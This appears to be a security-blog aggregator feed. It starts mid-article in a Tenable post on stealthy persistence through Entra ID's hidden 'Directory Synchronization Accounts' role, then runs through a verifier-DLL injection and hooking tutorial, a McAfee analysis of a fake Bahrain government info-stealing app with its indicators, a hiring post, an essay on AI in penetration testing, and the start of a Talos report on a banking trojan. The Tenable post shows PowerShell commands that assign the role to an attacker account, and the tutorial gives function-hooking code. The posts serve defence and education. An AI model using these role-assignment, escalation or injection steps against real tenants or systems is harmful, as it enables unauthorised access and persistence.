Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role, isn’t it? Well, as you guessed, it’s hidden too 🙈 (in all my tenants: no difference here):

Note that for those that prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
Only if Password-Hash Sync (PHS) is enabled, but the role allows to enable it
Only via the private “Azure AD Synchronization” API, that is implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc and it must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API, or the private Azure AD Provisioning API. So, the reset must be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
Not exploitable if the target has MFA or FIDO2 authentication enforced since the password can still be reset but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article, but in a summary, the idea is to identify an application or service principal having powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. Thus allowing to authenticate as the service principal, and abuse the appropriate method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.

Manage role assignment

Since one cannot manage this role using Azure portal nor Entra admin center, how to list or manage its assignees? We will see how, using the Microsoft Graph PowerShell SDK since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command allows to list the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (as seen in the beginning) instead of its name for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals” which can be either users, groups, or service principals (undocumented 😉), so different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how an attacker wishing to abuse this role for stealthy persistence would assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId [email protected]
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

🕵️ Any unrecognized suspicious assignee must be investigated because it may be a potential backdoor. Does it look like a legitimate Entra Connect or Entra Cloud Sync service user? Does its creation date correspond to the set up date of hybrid synchronization? Etc. Tenable Identity Exposure will soon add an Indicator of Exposure (IoE) allowing automatic identification of those suspicious “Directory Synchronization Accounts” role assignments, including more detailed recommendations.

🛡️ As a safety net, you can also follow Dr. Nestori Syynimaa’s recommendation to create a Conditional Access policy to block all users with that role, except the real legitimate synchronization user.

🤞 Finally, I hope that Microsoft will soon find a solution, with a better user experience, allowing to discourage the usage of the “Directory Synchronization Accounts” role, without resorting to hiding it, so customers can use the Azure portal or Entra admin center to see the role and its assignees.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Building a Verifier DLL

Pavel Yosifovich

1 June 2024 at 02:50

The Application Verifier tool that is part of the Windows SDK provide a way to analyze processes for various types of misbehavior. The GUI provided looks like the following:

Application Verifier application window

To add an application, you can browse your file system and select an executable. The Application Verifier settings are based around the executable name only – not a full path. This is because verifier settings are stored in a subkey under Image File Execution Options with the name of the executable. For the notepad example above, you’ll find the following in the Registry:

Key for notepad.exe under the IFEO subkey

This IFEO subkey is used for NT Global Flags settings, one of which is using the Application Verifier. The GlobalFlag value is shown to be 0x100, which is the bit used for the verifier. Another way to set it without any extra information is using the GFlags tool, part of the Debugging Tools for Windows package:

GFlags tool

The Application Verifier lists a bunch of DLLs under the VerifierDLLs value. Each one must be located in the system directory (e.g., c:\Windows\System32). Full paths are not supported; this is intentional, because the list of DLLs are going to be loaded to any process running the specified executable, and it would be risky to load DLLs from arbitrary locations in the file system. The system directory, as well as the IFEO key are normally write-accessible by administrators only.

The list of verifier DLLs is selected based on the set of tests selected by the user on the right hand side of the GUI. You’ll find subkeys that are used by the system-provided verifier DLLs with more settings related to the tests selected.

The nice thing about any verifier DLL specified, is that these DLLs are loaded early in the process lifetime, by verifier.dll (in itself loaded by NTDLL.dll), before any other DLLs are loaded into the process. Even attaching a debugger to the process while launching it would “miss” the loading of these DLLs.

This behavior makes this technique attractive for injecting a DLL into arbitrary processes. It’s even possible to enable Application Verifier globally and even dynamically (without the need to restart the system), so that these DLLs are injected into all processes (except protected processes).

Writing a Verifier DLL

Application Verifier tests descriptions is not the focus of this post. Rather, we’ll look into what it takes to create such a DLL that can be injected early and automatically into processes of our choice. As we’ll see, it’s not just about mere injection. The verifier infrastructure (part of verifier.dll) provides convenient facilities to hook functions.

If we create a standard DLL, set up the verifier entries while adding our DLL to the list of verifier DLLs (possibly removing the “standard” ones), and try to run our target executable (say, notepad), we get the following nasty message box:

The process shuts down, which means that if a verifier DLL fails to be properly processed, the process terminates rather than “skipping” the DLL.

Launching notepad with WinDbg spits the following output:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0x10CEC: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0x10CEC: flags 0x81643027: application verifier enabled
ModLoad: 00007ffc`cabd0000 00007ffc`cad6f000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
AVRF: provider MyVerify.dll did not initialize correctly

Clearly the DLL did not initialize correctly, which is what the NTSTATUS 0xc0000142 was trying to tell us in the message box.

DLLs are initialized with the DllMain function that typically looks like this:

BOOL WINAPI DllMain(HMODULE hModule, DWORD reason, PVOID lpReserved) {
	switch (reason) {
		case DLL_PROCESS_ATTACH:
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}

The classic four values shown are used by the DLL to run code when it’s loaded into a process (DLL_PROCESS_ATTACH), unloaded from a process (DLL_PROCESS_DETACH), a thread is created in the process (DLL_THREAD_ATTACH), and thread is exiting in the process (DLL_THREAD_DETACH). It turns out that there is a fifth value, which must be used with verifiier DLLs:

#define DLL_PROCESS_VERIFIER 4

Returning TRUE from such a case is not nearly enough. Instead, a structure expected by the caller of DllMain must be initialized and its address provided in lpReserved. The following structures and callback type definitions are needed:

typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
	PCHAR ThunkName;
	PVOID ThunkOldAddress;
	PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;

typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
	PWCHAR DllName;
	ULONG DllFlags;
	PVOID DllAddress;
	PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;

typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) (
	PWSTR DllName,
	PVOID DllBase,
	SIZE_T DllSize,
	PVOID Reserved);
typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) (
	PVOID AllocationBase,
	SIZE_T AllocationSize);

typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
	ULONG Length;
	PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
	RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
	RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;

	PWSTR VerifierImage;
	ULONG VerifierFlags;
	ULONG VerifierDebug;

	PVOID RtlpGetStackTraceAddress;
	PVOID RtlpDebugPageHeapCreate;
	PVOID RtlpDebugPageHeapDestroy;

	RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR;

That’s quite a list. The main structure is RTL_VERIFIER_PROVIDER_DESCRIPTOR that has a pointer to an array of RTL_VERIFIER_DLL_DESCRIPTOR (the last element in the array must end with all zeros), which in itself points to an array of RTL_VERIFIER_THUNK_DESCRIPTOR, used for specifying functions to hook. There are a few callbacks as well. At a minimum, we can define this descriptor like so (no hooking, no special code in callbacks):

RTL_VERIFIER_DLL_DESCRIPTOR noHooks{};

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	&noHooks,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

We can define these simply as global variables and return the address of desc in the handling of DLL_PROCESS_VERIFIER:

case DLL_PROCESS_VERIFIER:
	*(PVOID*)lpReserved = &desc;
	break;

With this code in place, we can try launching notepad again (after copying MyVerify.Dll to the System32 directory). Here is the output from WinDbg:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xB30C: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xB30C: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b50000 00007ffd`25cf1000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...

This time it works. MyVerify.dll loads right after verifier.dll (which is the one managing verify DLLs).

Hooking Functions

As mentioned before, we can use the verifier engine’s support for hooking functions in arbitrary DLLs. Let’s give this a try by hooking into a couple of functions, GetMessage and CreateFile. First, we need to set up the structures for the hooks on a per-DLL basis:

RTL_VERIFIER_THUNK_DESCRIPTOR user32Hooks[] = {
	{ (PCHAR)"GetMessageW", nullptr, HookGetMessage },
	{ nullptr, nullptr, nullptr },
};

RTL_VERIFIER_THUNK_DESCRIPTOR kernelbaseHooks[] = {
	{ (PCHAR)"CreateFileW", nullptr, HookCreateFile },
	{ nullptr, nullptr, nullptr },
};

The second NULL in each triplet is where the original address of the hooked function is stored by the verifier engine. Now we fill the structure with the list of DLLs, pointing to the hook arrays:

RTL_VERIFIER_DLL_DESCRIPTOR dlls[] = {
	{ (PWCHAR)L"user32.dll", 0, nullptr, user32Hooks },
	{ (PWCHAR)L"kernelbase.dll", 0, nullptr, kernelbaseHooks },
	{ nullptr, 0, nullptr, nullptr },
};

Finally, we update the main structure with the dlls array:

RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = {
	sizeof(desc),
	dlls,
	[](auto, auto, auto, auto) {},
	[](auto, auto, auto, auto) {},
	nullptr, 0, 0,
	nullptr, nullptr, nullptr,
	[](auto, auto) {},
};

The last thing is to actually implement the hooks:

BOOL WINAPI HookGetMessage(PMSG msg, HWND hWnd, UINT filterMin, UINT filterMax) {
	// get original function
	static const auto orgGetMessage = (decltype(::GetMessageW)*)user32Hooks[0].ThunkOldAddress;
	auto result = orgGetMessage(msg, hWnd, filterMin, filterMax);
	char text[128];
	sprintf_s(text, "Received message 0x%X for hWnd 0x%p\n", msg->message, msg->hwnd);
	OutputDebugStringA(text);
	return result;
}

HANDLE WINAPI HookCreateFile(PCWSTR path, DWORD access, DWORD share, LPSECURITY_ATTRIBUTES sa, DWORD cd, DWORD flags, HANDLE hTemplate) {
	// get original function
	static const auto orgCreateFile = (decltype(::CreateFileW)*)kernelbaseHooks[0].ThunkOldAddress;
	auto hFile = orgCreateFile(path, access, share, sa, cd, flags, hTemplate);
	char text[512];
	if (hFile == INVALID_HANDLE_VALUE)
		sprintf_s(text, "Failed to open file %ws (%u)\n", path, ::GetLastError());
	else
		sprintf_s(text, "Opened file %ws successfuly (0x%p)\n", path, hFile);

	OutputDebugStringA(text);
	return hFile;
}

The hooks just send some output with OutputDebugString. Here is an excerpt output when running notepad under a debugger:

ModLoad: 00007ff7`6dfa0000 00007ff7`6dfd8000   notepad.exe
ModLoad: 00007ffd`978f0000 00007ffd`97ae8000   ntdll.dll
ModLoad: 00007ffd`1f650000 00007ffd`1f6c4000   C:\Windows\System32\verifier.dll
Page heap: pid 0xEF18: page heap enabled with flags 0x3.
AVRF: notepad.exe: pid 0xEF18: flags 0x81643027: application verifier enabled
ModLoad: 00007ffd`25b80000 00007ffd`25d24000   C:\Windows\SYSTEM32\MyVerify.dll
ModLoad: 00007ffd`97650000 00007ffd`9770d000   C:\Windows\System32\KERNEL32.dll
ModLoad: 00007ffd`951b0000 00007ffd`954a6000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`963e0000 00007ffd`9640b000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`95790000 00007ffd`957b2000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`95090000 00007ffd`951a7000   C:\Windows\System32\gdi32full.dll
...
ModLoad: 00007ffd`964f0000 00007ffd`965bd000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`96d10000 00007ffd`96d65000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`965d0000 00007ffd`966e4000   C:\Windows\System32\MSCTF.dll
Opened file C:\Windows\Fonts\staticcache.dat successfuly (0x0000000000000164)
ModLoad: 00007ffd`7eac0000 00007ffd`7eb6c000   C:\Windows\System32\TextShaping.dll
ModLoad: 00007ffc`ed750000 00007ffc`ed82e000   C:\Windows\System32\efswrt.dll
ModLoad: 00007ffd`90880000 00007ffd`909d7000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`8bf90000 00007ffd`8bfad000   C:\Windows\System32\MPR.dll
ModLoad: 00007ffd`8cae0000 00007ffd`8cce3000   C:\Windows\System32\twinapi.appcore.dll
Opened file C:\Windows\Registration\R000000000025.clb successfuly (0x00000000000001C4)
ModLoad: 00007ffd`823b0000 00007ffd`82416000   C:\Windows\System32\oleacc.dll
...
Received message 0x31F for hWnd 0x00000000001F1776
Received message 0xC17C for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000001F1776
Received message 0xF for hWnd 0x00000000003010C0
Received message 0xF for hWnd 0x0000000000182E7A
Received message 0x113 for hWnd 0x00000000003319A8
...
ModLoad: 00007ffd`80e20000 00007ffd`80fd4000   C:\Windows\System32\WindowsCodecs.dll
ModLoad: 00007ffd`94ee0000 00007ffd`94f04000   C:\Windows\System32\profapi.dll
Opened file C:\Users\Pavel\AppData\Local\IconCache.db successfuly (0x0000000000000724)
ModLoad: 00007ffd`3e190000 00007ffd`3e1f6000   C:\Windows\System32\thumbcache.dll
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db successfuly (0x0000000000000450)
Opened file C:\Users\Pavel\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db successfuly (0x000000000000065C)
ModLoad: 00007ffd`90280000 00007ffd`90321000   C:\Windows\SYSTEM32\policymanager.dll

This application verifier technique is an interesting one, and fairly easy to use. The full example can be found at https://github.com/zodiacon/VerifierDLL.

Happy verifying!

Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud

McAfee Blogs

McAfee Labs

31 May 2024 at 21:43

Authored by Dexter Shin

Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?

McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who are deceived by advertisements that they are available on mobile will be provided with the necessary personal information for these services without a doubt. They reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending personal information.

Detailed pretended app

In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.

Figure 1. Legitimate official LMRA website

Figure 2. Fake app named LMRA

Excluding the most frequently found fake apps pretending LMRA, there are various fake apps included Bank of Bahrain and Kuwait (BBK), BenefitPay, a fintech company in Bahrain, and even apps pretending to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.

Figure 3. Various fake apps using the same techniques

From the type of app that this malware pretends, we can guess that the purpose is financial fraud to use the personal information it has stolen. Moreover, someone has been affected by this campaign as shown in the picture below.

Figure 4. Victims of financial fraud (Source: Reddit)

Distribution method

They distribute these apps using Facebook pages and SMS messages. Facebook pages are fake and malware author is constantly creating new pages. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.

Figure 5. Facebook profile and page with a link to the phishing site

Figure 6. One of the phishing sites designed to download app

In the case of SMS, social engineering messages are sent to trick users into clicking a link so that they feel the need to urgently confirm.

Figure 7. Phishing message using SMS (Source: Reddit)

What they want

When the user launches the app, the app shows a large legitimate icon for users to be mistaken. And it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it is simply a button to send information to the C2 server. If users input their information, it goes directly to the next screen without verification. This step just stores the information for the next step.

Figure 8. The first screen (left) and next screen of a fake app (right)

There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.

Figure 9. All menus are linked to the same URL

The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information inputted so far will be sent to the malware author’s c2 server.

Figure 10. All data sent to C2 server

After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.

Figure 11. Completion page to trick users

In addition, they have a payload for stealing SMS. This app has a receiver that works when SMS is received. So as soon as SMS comes, it sends an SMS message to the C2 server without notifying the user.

Figure 12. Payload for stealing SMS

Dynamic loading of phishing sites via Firebase

We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.

For apps that use Firebase, dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, it is possible to respond quickly to maintain already installed victims by changing the URL stored in Firestore.

Figure 13. Dynamically loading phishing site loaded in webview

Conclusion

According to our detection telemetry data, there are 62 users have already used this app in Bahrain. However, since this data is a number at the time of writing, this number is expected to continue to increase, considering that new Facebook pages are still being actively created.

Recent malware tends to target specific countries or users rather than widespread attacks. These attacks may be difficult for general users to distinguish because malware accurately uses the parts needed by users living in a specific country. So we recommend users install secure software to protect their devices. Also, users are encouraged to download and use apps from official app stores like Google Play Store or Apple AppStore. If you can’t find an app in these stores, you must download the app provided on the official website.

McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.

Indicators of Compromise (IOCs)

Samples:

SHA256	Package Name	App Name
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c	com.ariashirazi.instabrowser	LMRA
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d	com.npra.bahrain.five	LMRA Bahrain
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb	com.npra.bahrain.five	LMRA Bahrain
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a	com.lmra.nine.lmranine	LMRA
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730	com.stich.inches	Visa Update
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba	com.ariashirazi.instabrowser	EasyLoan
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819	com.ariashirazi.instabrowser	BTC Flasher
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44	com.ariashirazi.instabrowser	BenefitPay
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546	com.lymors.lulumoney	BBK Loan App

Domains:

https[://]lmraa.com
https[://]lmjbfv.site
https[://]dbjiud.site
https[://]a.jobshuntt.com
https[://]shop.wecarerelief.ca

Firebase(for C2):

https[://]npra-5.firebaseio.com
https[://]lmra9-38b17.firebaseio.com
https[://]practice-8e048.firebaseio.com

The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Exodus Intelligence

exodusintel

31 May 2024 at 14:18

Hacking the Future: 12 Years at Exodus and the Next Big Leap

Tl;dr – We are hiring engineers, analysts, and researchers.

This May marked our 12th year of producing world-class vulnerability intelligence at Exodus Intelligence. We have had many ups (and downs) and have worked with a variety of talented people over the years whose collective contributions have made us who we are today. Throughout our history we have stayed true to our founding mission of maintaining a hacking culture, made by hackers, for hackers. We challenge and pride ourselves on researching some of the hardest targets, across a diversity of platforms and operating systems. As a team we have analyzed (I’m’, talking weeks long, thorough, root cause analysis) more than 1,600 Nday, and discovered over 400 0day in enterprise products. Whether software, hardware, server side, client side, IoT… our experts have done it all.

It has been a bit of a waiting game for the industry to build an appreciation for vulnerability intelligence, let alone Zeroday vulnerability intelligence. I would argue that the industry is finally there, and with the help of a lot of the big companies, there are products that can effectively detect and defend against this category of risks.

There is still a degree of “wild west” in the industry where it is hard to design and maintain standards for reporting, tracking and cataloging vulnerabilities (CVE, CVSS, CNAs, CPEs, SBOM,…). At Exodus we have always focused on the core research as our wheelhouse and put less effort on the website, front end, and engineering work that drives how people view, search and ingest our data. The market demands it now.

We are at an inflection point and aim to make our data more widely available and develop what tools we can to aggregate, enrich and curate all the public data, marry it with our own discoveries and analysis, and distribute to our customers. We have developed integrations for Splunk, Demisto (Cortex XSOAR), Slack, Recorded Future, to name a few examples, but the engineering lift is large, and the research support is insurmountable. Even as we jump on the GenAI band wagon with everyone else and invest in LLM, ML and AI, that technology is only as good as its input/data, so our researchers will need to spend the requisite time and effort training these models.

Now to the point of this post, we are hiring. We are looking for engineers with a special motivation to understand these challenges and have a passion to build solutions that chip away at the problems. We intend to make some of this tooling, code, and data available to the public, so the engineers we bring onboard should have an appreciation for open source code. While we’re always looking for elite researchers to join the team, these engineering efforts will soon unlock the need for an army of analysts that are interested in coverage of public data an inch deep, and a mile wide. We will have the incentives and mentorship in place to refine and develop skills towards hacking more difficult targets and research, but for the first time we will be opening our doors to entry level analysts with the motivation to learn and gain unparalleled experience in the world of vulnerability research.

Current openings include:

Full-Stack Software Engineer
Web Browser Vulnerability Researcher
Mobile Vulnerability Researcher
Zero-Day Vulnerability Researcher
N-Day Vulnerability Researcher

Please apply at our careers page

The post Hacking the Future: 12 Years at Exodus and the Next Big Leap appeared first on Exodus Intelligence.

Why AI Will Not Fully Replace Humans for Web Penetration Testing

NCC Group Research

Steven van der Baan

31 May 2024 at 14:14

Written by: Steven van der Baan

In the ever-evolving landscape of cybersecurity, the integration of artificial intelligence (AI) has revolutionized various aspects of threat detection, prevention, and mitigation. Web penetration testing, a crucial component of ensuring the security posture of digital assets, has seen significant advancements through AI-powered tools. While AI undoubtedly offers numerous benefits in this domain, it’s essential to recognize that it cannot entirely replace human expertise and intuition. In this article, we explore the reasons why AI will not fully replace humans for web penetration testing.

AI excels in handling immense data volumes while recognizing patterns. However, it typically lacks the contextual understanding that human testers possess. Web applications function within specific business contexts, and vulnerabilities may manifest differently based on various factors such as industry, user behaviour, and regulatory requirements. Human testers can interpret these nuances and prioritize findings based on their potential impact on the organization’s objectives.

One of the fundamental challenges in cybersecurity is staying ahead of adversaries who continually innovate and devise new attack techniques. Although AI algorithms can detect known vulnerabilities efficiently, they may struggle to adapt to novel attack vectors or zero-day exploits. Human penetration testers bring creativity to the table, utilizing their experience and intuition to think like attackers and uncover unexpected vulnerabilities that automated tools might miss.

Certain categories of vulnerabilities, such as logical flaws or business logic errors, often require human intervention to identify accurately. These vulnerabilities may not be easily detectable through automated scanning alone, as they involve understanding the underlying logic of the application and its intended functionality. Human testers can replicate real-world scenarios and apply sophisticated techniques to uncover subtle security weaknesses that AI might overlook.

AI-powered tools for web penetration testing are prone to generating false positives (incorrectly identifying vulnerabilities that do not exist) and false negatives (overlooking actual vulnerabilities). Although advancements in machine learning have improved accuracy, eliminating both false positives and false negatives remains a significant challenge. Human testers play an essential role in validating automated findings, minimizing false alarms, and providing valuable insights into the context of each vulnerability.

The ethical and legal implications of automated penetration testing must be carefully considered. AI-powered tools may generate substantial volumes of traffic and potentially disrupt web applications, leading to unintended consequences or violations of terms of service. Furthermore, utilizing automated tools without proper authorization can result in legal repercussions. Human testers exercise judgment, ensuring that tests are conducted responsibly, with appropriate permissions and adherence to ethical guidelines.

While AI has revolutionized web penetration testing by automating routine tasks, detecting known vulnerabilities, and enhancing efficiency, it cannot replace the critical thinking, intuition, and creativity of human testers. The synergy between AI and human expertise is essential for conducting comprehensive and effective security assessments. By leveraging the strengths of both AI-powered tools and human testers, organizations can achieve a more robust and adaptive approach to web application security.

New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Cisco Talos

31 May 2024 at 12:00

Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil. This family has also been referenced as AllaSenha in a recent report.
Talos attributes with high confidence the development and operation of CarnavalHeist to Brazilian actors who could be identified because of some operational mistakes made during the domain registration process for their payload-hosting sites.
The current campaign uses financial-related themes in spam emails, Delphi-based DLLs, overlay attack methods, and usual input capture techniques, such as keylogging and screen capture. There are also names of traditional Brazilian banks hardcoded in the malware.
Unique to CarnavalHeist, however, is the dynamic use of a Python-based loader as part of the DLL injection process and the specific targeting of banking desktop applications to enable tracking of other Brazilian financial institutions.

CarnavalHeist has Brazilian origins

New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Talos assesses with high confidence that the CarnavalHeist malware is of Brazilian origin and primarily targets Brazilian users based on our observations of the Portuguese language being used throughout all aspects of the infection chain and the malware itself, including the use of Brazilian slang to describe some bank names, and a notable lack of other language variants thus far. The command and control (C2) infrastructure exclusively uses the BrazilSouth availability zone on Microsoft Azure to control infected machines, and they specifically target prominent Brazilian financial institutions.

